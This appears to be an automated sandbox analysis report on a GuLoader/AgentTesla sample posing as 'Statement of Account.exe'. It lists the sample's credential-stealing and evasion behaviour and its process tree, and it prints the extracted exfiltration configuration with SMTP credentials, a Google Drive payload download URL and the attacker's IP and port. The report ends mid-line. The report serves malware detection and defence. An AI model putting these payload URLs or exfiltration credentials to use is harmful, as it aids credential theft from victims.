
Windows Analysis Report Statement of Account.exe

Overview

General Information

Sample Name: Statement of Account.exe
Analysis ID: 1640
MD5: 1232806812f946a2afabc5f5fe489de5
SHA1: f9a820627667403e90b3a387de0b644f8f0ddc31
SHA256: 86907475c81bc4700fc465c758592c51e905feed8aecdc0c10ccb6a8c650218a

Detection

GuLoader AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
GuLoader behavior detected
Sigma detected: RegAsm connects to smtp port
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • Statement of Account.exe (PID: 2204 cmdline: 'C:\Users\user\Desktop\Statement of Account.exe' MD5: 1232806812F946A2AFABC5F5FE489DE5)
    • RegAsm.exe (PID: 3428 cmdline: 'C:\Users\user\Desktop\Statement of Account.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 1544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • DnDcR.exe (PID: 1820 cmdline: 'C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • conhost.exe (PID: 4976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • DnDcR.exe (PID: 3484 cmdline: 'C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • conhost.exe (PID: 3088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "hemant@friendsequipment.com2018@hemantmail.friendsequipment.com"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000001.00000002.47854626661.0000000002260000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: RegAsm.exe PID: 3428 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
Process Memory Space: RegAsm.exe PID: 3428 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

Sigma Overview

Networking:

Sigma detected: RegAsm connects to smtp port
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 65.60.11.90, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 3428, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49821

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: conhost.exe.3088.17.memstrmin | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "hemant@friendsequipment.com2018@hemantmail.friendsequipment.com"}
Multi AV Scanner detection for submitted file
Source: Statement of Account.exe | ReversingLabs: Detection: 23%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_1D32DA50 CryptUnprotectData, 9_2_1D32DA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_1D32E0FB CryptUnprotectData, 9_2_1D32E0FB
Source: Statement of Account.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown | HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49809 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.181.225:443 -> 192.168.11.20:49810 version: TLS 1.2
Source: Binary string: RegAsm.pdb source: DnDcR.exe, DnDcR.exe.9.dr
Source: Binary string: RegAsm.pdb4 source: DnDcR.exe, 0000000E.00000002.48160223360.0000000000142000.00000002.00020000.sdmp, DnDcR.exe, 00000010.00000002.48240148335.00000000000D2000.00000002.00020000.sdmp, DnDcR.exe.9.dr
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_00403248
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edi, edi | 1_2_00403248
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_00403248
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_00403248
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then sub ecx, F6DD248Dh | 1_2_0040225E
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_0040225E
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edi, edi | 1_2_0040225E
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_0040225E
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_0040225E
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edi, edi | 1_2_0040346B
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_0040346B
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_0040346B
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_00403611
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_00403611
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_00403827
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edi, edi | 1_2_004032D4
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_004032D4
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_004032D4
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_00403697
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_00403697
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_004038AC
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edi, edi | 1_2_0040336A
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_0040336A
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_0040336A
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_0040371F
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_0040371F
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_004039C9
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edi, edi | 1_2_004033EA
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_004033EA
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_004033EA
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_00403581
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_00403581
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_00403586
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_00403586
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_00403588
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_00403588
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_0040358A
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_0040358A
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_0040358C
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_0040358C
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_0040358E
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_0040358E
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_00403590
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_00403590
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_00403592
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_00403592
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_00403596
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_00403596
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_00403598
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_00403598
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_0040359A
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_0040359A
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_0040359C
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_0040359C
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_0040359E
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_0040359E
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_004035A0
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_004035A0
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_004035A2
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_004035A2
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_004035A4
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_004035A4
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_004035A6
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_004035A6
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_004035A8
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_004035A8
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_004035AA
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_004035AA
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_004031BE
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edi, edi | 1_2_004031BE
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 4x nop then mov edx, edx | 1_2_004031BE
Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 5x nop then xor eax, dword ptr [edx+esi] | 1_2_004031BE

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.11.20:49821 -> 65.60.11.90:587
Source: Joe Sandbox View | ASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected:
    GET /uc?export=download&id=1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: drive.google.com
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/946on81l5g2k8pionitvg39ebi65v2bf/1634128725000/08714151441044389622/*/1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh?e=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Cache-Control: no-cache
    Host: doc-0g-4k-docs.googleusercontent.com
    Connection: Keep-Alive
Source: global traffic | TCP traffic: 192.168.11.20:49821 -> 65.60.11.90:587
Source: global traffic | TCP traffic: 192.168.11.20:49821 -> 65.60.11.90:587
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown | Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe, 00000009.00000002.52067824237.000000001E4DA000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52067893875.000000001E4E8000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000003.48737845239.000000001D071000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp | String found in binary or memory: http://LUDB17WCKZR.org
Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp | String found in binary or memory: http://VpGUaC.com
Source: RegAsm.exe, 00000009.00000003.47831165616.0000000001665000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: RegAsm.exe, 00000009.00000003.47831165616.0000000001665000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegAsm.exe, 00000009.00000002.52067824237.000000001E4DA000.00000004.00000001.sdmp | String found in binary or memory: http://friendsequipment.com
Source: RegAsm.exe, 00000009.00000002.52067824237.000000001E4DA000.00000004.00000001.sdmp | String found in binary or memory: http://mail.friendsequipment.com
Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%4
Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: RegAsm.exe, 00000009.00000003.47831165616.0000000001665000.00000004.00000001.sdmp | String found in binary or memory: https://doc-0g-4k-docs.googleusercontent.com/
Source: RegAsm.exe, 00000009.00000003.47831098250.000000000165E000.00000004.00000001.sdmp | String found in binary or memory: https://doc-0g-4k-docs.googleusercontent.com/%%doc-0g-4k-docs.googleusercontent.com
Source: RegAsm.exe, 00000009.00000002.52056100424.000000000162E000.00000004.00000020.sdmp | String found in binary or memory: https://doc-0g-4k-docs.googleusercontent.com/4
Source: RegAsm.exe, 00000009.00000003.47831165616.0000000001665000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52056281072.000000000164E000.00000004.00000020.sdmp | String found in binary or memory: https://doc-0g-4k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/946on81l
Source: RegAsm.exe, 00000009.00000002.52055783599.00000000015E8000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/
Source: RegAsm.exe, 00000009.00000002.52055783599.00000000015E8000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/Q
Source: RegAsm.exe, 00000009.00000003.47831165616.0000000001665000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52055392488.0000000001500000.00000004.00000001.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh
Source: RegAsm.exe, 00000009.00000002.52066831984.000000001E412000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/
Source: RegAsm.exe, 00000009.00000002.52067968626.000000001E4F0000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com//
Source: RegAsm.exe, 00000009.00000002.52067968626.000000001E4F0000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/https://login.live.com/
Source: RegAsm.exe, 00000009.00000002.52067968626.000000001E4F0000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/v104
Source: RegAsm.exe, 00000009.00000002.52066831984.000000001E412000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown | DNS traffic detected: queries for: drive.google.com
Source: global traffic | HTTP traffic detected:
    GET /uc?export=download&id=1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: drive.google.com
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/946on81l5g2k8pionitvg39ebi65v2bf/1634128725000/08714151441044389622/*/1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh?e=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Cache-Control: no-cache
    Host: doc-0g-4k-docs.googleusercontent.com
    Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49809 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.181.225:443 -> 192.168.11.20:49810 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands:

Modifies the hosts file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File written: C:\Windows\System32\drivers\etc\hosts

System Summary:

Potential malicious icon found
Source: initial sample | Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Source: Statement of Account.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: String function: 0040177E appears 94 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 01286A80 appears 52 times
            Source: C:\Users\user\Desktop\Statement of Account.exeProcess Stats: CPU usage > 98%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 98%
            Source: Statement of Account.exe, 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameedderfu.exe vs Statement of Account.exe
            Source: Statement of Account.exe, 00000001.00000002.47854997401.0000000002AC0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameedderfu.exeFE2X vs Statement of Account.exe
            Source: Statement of Account.exeBinary or memory string: OriginalFilenameedderfu.exe vs Statement of Account.exe
            Source: Statement of Account.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeSection loaded: edgegdi.dllJump to behavior
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
            Source: Statement of Account.exeReversingLabs: Detection: 23%
            Source: Statement of Account.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Statement of Account.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Statement of Account.exe 'C:\Users\user\Desktop\Statement of Account.exe'
            Source: C:\Users\user\Desktop\Statement of Account.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Statement of Account.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe 'C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe'
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe 'C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe'
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Statement of Account.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Statement of Account.exe' Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Roaming\DnDcRJump to behavior
            Source: classification engineClassification label: mal100.rans.spre.troj.adwa.spyw.evad.winEXE@8/6@3/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1544:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3088:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3088:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1544:304:WilStaging_02
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Binary string: RegAsm.pdb source: DnDcR.exe, DnDcR.exe.9.dr
            Source: Binary string: RegAsm.pdb4 source: DnDcR.exe, 0000000E.00000002.48160223360.0000000000142000.00000002.00020000.sdmp, DnDcR.exe, 00000010.00000002.48240148335.00000000000D2000.00000002.00020000.sdmp, DnDcR.exe.9.dr

            Data Obfuscation:

            Yara detected GuLoader
            Source: Yara match | File source: 00000001.00000002.47854626661.0000000002260000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Statement of Account.exe | Code function: 1_2_00404E6E push esp; retf 1_2_00404E8E
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_00407C85 push C8F569B9h; ret <